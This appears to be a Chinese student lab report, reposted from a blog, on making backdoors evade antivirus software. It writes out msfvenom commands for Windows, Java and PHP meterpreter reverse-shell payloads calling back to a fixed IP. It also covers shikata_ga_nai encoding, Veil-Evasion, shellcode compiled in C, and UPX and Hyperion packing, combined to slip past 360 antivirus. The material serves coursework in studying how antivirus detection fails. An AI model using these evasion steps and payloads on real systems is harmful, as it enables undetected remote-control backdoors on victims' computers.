标签:替换 生成文件 col 学习 安全 界面 ash 连接 encode
1、正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,加壳工具,自己利用shellcode编程等免杀工具或技巧
2、通过组合应用各种技术实现恶意代码免杀
3、用另一电脑实测,在杀软开启的情况下,可运行并回连成功,注明电脑的杀软名称与版本
(1)杀软是如何检测出恶意代码的?
(2)免杀是做什么?
(3)免杀的基本方法有哪些?
任务一:正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,自己利用shellcode编程等免杀工具或技巧
VirusTotal扫描结果如下:
Virscan网站的扫描结果如下:
由此可见,不加任何处理的后门程序可以被大多数杀毒软件检测到。
下面我们用msf编码器对后门程序进行一次到多次的编码,并进行检测。
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b ‘\x00‘ LHOST=192.168.150.132 LPORT=5107 -f exe > met-encoded.exe
扫描一下:
-i
设置迭代次数msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b ‘\x00’ LHOST=192.168.150.132 LPORT=5107 -f exe > met-encoded10.exe
扫描一下:
可见多次编码对免杀并没有太大的效果。我觉得是因为编码器使用默认参数或模板,有一定的固定特征。一般来说AV厂商会针对其使用的模板来生成特征码,这样就一劳永逸地解决所有msfvenom生成的恶意代码了。
2、msfvenom生成jar文件
msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.150.132
LPORT=5107 x> lyl_backdoor_java.jar 并进行扫描。
3、msfvenom生成php文件
msfvenom
-p php/meterpreter/reverse_tcp LHOST=192.168.150.132 LPORT=5107 x> 20165107_backdoor.php
扫描结果如下:
4. 使用veil-evasion生成后门程序及检测
veil
指令,会出现下面这个界面。
用use evasion
命令进入Evil-Evasion
输入命令use c/meterpreter/rev_tcp.py
进入配置界面
generate
生成文件,接着输入你想要playload的名字:veil_c_5107
5. 半手工注入Shellcode并执行
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.150.132 LPORT=5107 -f c
用c语言生成一段shellcode;20165107.c
,然后将unsigned char buf[]
赋值到其中:i686-w64-mingw32-g++ 20165107.c -o 20165107.exe
编译这个.c文件为可执行文件;6、加壳
给之前的20165107.exe加个壳得到lyl_upxed.exe;
然而杀软依然能检测到:
进行扫描检测,免杀效果不错:
将上一个生成的文件拷贝到/usr/share/windows-binaries/hyperion/目录中
进入目录/usr/share/windows-binaries/hyperion/中
输入命令wine hyperion.exe -v lyl_upxed.exe lyl_upxed_Hyperion.exe进行加壳并尝试反弹连接
进行检测:
任务二、通过组合应用各种技术实现恶意代码免杀
首先用C语言生成一段shellcode,然后将C语言文件变成可执行文件,然后进行加壳,先进行压缩壳,然后进行加密壳(具体操作可看上面任务)
然后进行360查杀如图:
有趣的是,比如360杀软都是只在第一次扫描不出来,你再次查杀是就会被发现,我觉得这可能和杀软的特征库更新有关吧。
任务三、用另一电脑实测,在杀软开启的情况下,可运行并回连成功,注明电脑的杀软名称与版本
我在交叉编译时出现以下问题:“Bash: i686-w64-mingw32-g++:未找到命令”
解决 :我的kali里没有自带的minw64编译器,所以需要sudo apt-get install mingw-w64来安装。
1、开启杀软能绝对防止电脑中恶意代码吗:
答:经过实验,我发现杀软不能检测到的恶意代码还是非常多的,可谓漏洞百出,安装了杀软不能保证计算机网络及系统的绝对安全,杀软的监测能力十分有限。
2、实验体会:
答:本次实验承接上次的后门实验,是实验二的进阶学习,这就需要我们熟练掌握和运用后门技术,通过本次实验,我了解了免杀的概念、免杀的基本方法,了解并使用了VirusTotal、Virscan等工具,实现了最简单的免杀的处理手段,过程十分有趣,在实践中熟习后门和免杀基本操作。同时,我也意识到杀软的监测能力十分有限,所以在以后上网的过程中还需提高网络安全意识,下载软件通过正规渠道,从而降低被植入后门的可能性。我也相信,杀软这只盾也会随着资源库的更新、网安技术的成熟愈发强大坚固,能够给与广大互联网用户更优秀的、更加可信赖的安全防护。
2018~2019-4 20165107 网络对抗技术 Exp3 免杀原理与实践
标签:替换 生成文件 col 学习 安全 界面 ash 连接 encode
原文地址:https://www.cnblogs.com/3523108059lyl/p/10633461.html